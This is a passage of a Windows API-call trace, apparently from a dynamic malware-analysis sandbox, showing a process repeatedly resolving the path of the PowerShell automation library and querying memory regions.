lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.409] GetLastError () returned 0x0 [0145.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.409] GetLastError () returned 0x0 [0145.409] VirtualQuery (in: lpAddress=0x2dd444, lpBuffer=0x2de444, dwLength=0x1c | out: lpBuffer=0x2de444*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.410] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dde38, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.410] GetLastError () returned 0x0 [0145.410] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddde8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.410] GetLastError () returned 0x0 [0145.410] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddde8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.410] GetLastError () returned 0x0 [0145.410] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.410] GetLastError () returned 0x0 [0145.410] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.410] GetLastError () returned 0x0 [0145.410] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.411] GetLastError () returned 0x0 [0145.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.411] GetLastError () returned 0x0 [0145.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.411] GetLastError () returned 0x0 [0145.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.411] GetLastError () returned 0x0 [0145.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.411] GetLastError () returned 0x0 [0145.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.411] GetLastError () returned 0x0 [0145.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.411] GetLastError () returned 0x0 [0145.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.411] GetLastError () returned 0x0 [0145.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.411] GetLastError () returned 0x0 [0145.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.411] GetLastError () returned 0x0 [0145.412] VirtualQuery (in: lpAddress=0x2dd444, lpBuffer=0x2de444, dwLength=0x1c | out: lpBuffer=0x2de444*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dde38, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.412] GetLastError () returned 0x0 [0145.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddde8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.412] GetLastError () returned 0x0 [0145.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddde8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.412] GetLastError () returned 0x0 [0145.412] VirtualQuery (in: lpAddress=0x2dd444, lpBuffer=0x2de444, dwLength=0x1c | out: lpBuffer=0x2de444*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.412] GetLastError () returned 0x0 [0145.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.412] GetLastError () returned 0x0 [0145.413] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.413] GetLastError () returned 0x0 [0145.413] VirtualQuery (in: lpAddress=0x2dd074, lpBuffer=0x2de074, dwLength=0x1c | out: lpBuffer=0x2de074*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.413] VirtualQuery (in: lpAddress=0x2dd0b0, lpBuffer=0x2de0b0, dwLength=0x1c | out: lpBuffer=0x2de0b0*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.413] VirtualQuery (in: lpAddress=0x2dd378, lpBuffer=0x2de378, dwLength=0x1c | out: lpBuffer=0x2de378*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.413] VirtualQuery (in: lpAddress=0x2dd3b4, lpBuffer=0x2de3b4, dwLength=0x1c | out: lpBuffer=0x2de3b4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.414] VirtualQuery (in: lpAddress=0x2dd378, lpBuffer=0x2de378, dwLength=0x1c | out: lpBuffer=0x2de378*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.414] VirtualQuery (in: lpAddress=0x2dd3b4, lpBuffer=0x2de3b4, dwLength=0x1c | out: lpBuffer=0x2de3b4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.414] VirtualQuery (in: lpAddress=0x2dd3b4, lpBuffer=0x2de3b4, dwLength=0x1c | out: lpBuffer=0x2de3b4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.414] VirtualQuery (in: lpAddress=0x2dd378, lpBuffer=0x2de378, dwLength=0x1c | out: lpBuffer=0x2de378*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.414] VirtualQuery (in: lpAddress=0x2dd3b4, lpBuffer=0x2de3b4, dwLength=0x1c | out: lpBuffer=0x2de3b4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.414] VirtualQuery (in: lpAddress=0x2dd378, lpBuffer=0x2de378, dwLength=0x1c | out: lpBuffer=0x2de378*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.415] VirtualQuery (in: lpAddress=0x2dd3b4, lpBuffer=0x2de3b4, dwLength=0x1c | out: lpBuffer=0x2de3b4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.415] VirtualQuery (in: lpAddress=0x2dd378, lpBuffer=0x2de378, dwLength=0x1c | out: lpBuffer=0x2de378*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.415] VirtualQuery (in: lpAddress=0x2dd3b4, lpBuffer=0x2de3b4, dwLength=0x1c | out: lpBuffer=0x2de3b4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.415] VirtualQuery (in: lpAddress=0x2dd21c, lpBuffer=0x2de21c, dwLength=0x1c | out: lpBuffer=0x2de21c*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.415] VirtualQuery (in: lpAddress=0x2dd378, lpBuffer=0x2de378, dwLength=0x1c | out: lpBuffer=0x2de378*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.416] VirtualQuery (in: lpAddress=0x2dd3b4, lpBuffer=0x2de3b4, dwLength=0x1c | out: lpBuffer=0x2de3b4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.416] VirtualQuery (in: lpAddress=0x2dd378, lpBuffer=0x2de378, dwLength=0x1c | out: lpBuffer=0x2de378*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.416] VirtualQuery (in: lpAddress=0x2dd3b4, lpBuffer=0x2de3b4, dwLength=0x1c | out: lpBuffer=0x2de3b4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.416] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x822f0093, Data2=0x8501, Data3=0x47e0, Data4=([0]=0xb1, [1]=0x7b, [2]=0x1e, [3]=0xc7, [4]=0xad, [5]=0x3a, [6]=0x50, [7]=0xa1))) returned 0x0 [0145.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.416] GetLastError () returned 0x0 [0145.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.416] GetLastError () returned 0x0 [0145.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.416] GetLastError () returned 0x0 [0145.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.417] GetLastError () returned 0x0 [0145.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.417] GetLastError () returned 0x0 [0145.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.417] GetLastError () returned 0x0 [0145.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.417] GetLastError () returned 0x0 [0145.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.417] GetLastError () returned 0x0 [0145.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.417] GetLastError () returned 0x0 [0145.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.418] GetLastError () returned 0x0 [0145.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.418] GetLastError () returned 0x0 [0145.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.418] GetLastError () returned 0x0 [0145.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.418] GetLastError () returned 0x0 [0145.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.418] GetLastError () returned 0x0 [0145.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.418] GetLastError () returned 0x0 [0145.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.418] GetLastError () returned 0x0 [0145.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.418] GetLastError () returned 0x0 [0145.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.418] GetLastError () returned 0x0 [0145.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.418] GetLastError () returned 0x0 [0145.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.419] GetLastError () returned 0x0 [0145.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.419] GetLastError () returned 0x0 [0145.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.419] GetLastError () returned 0x0 [0145.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.419] GetLastError () returned 0x0 [0145.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.419] GetLastError () returned 0x0 [0145.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.419] GetLastError () returned 0x0 [0145.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf80, 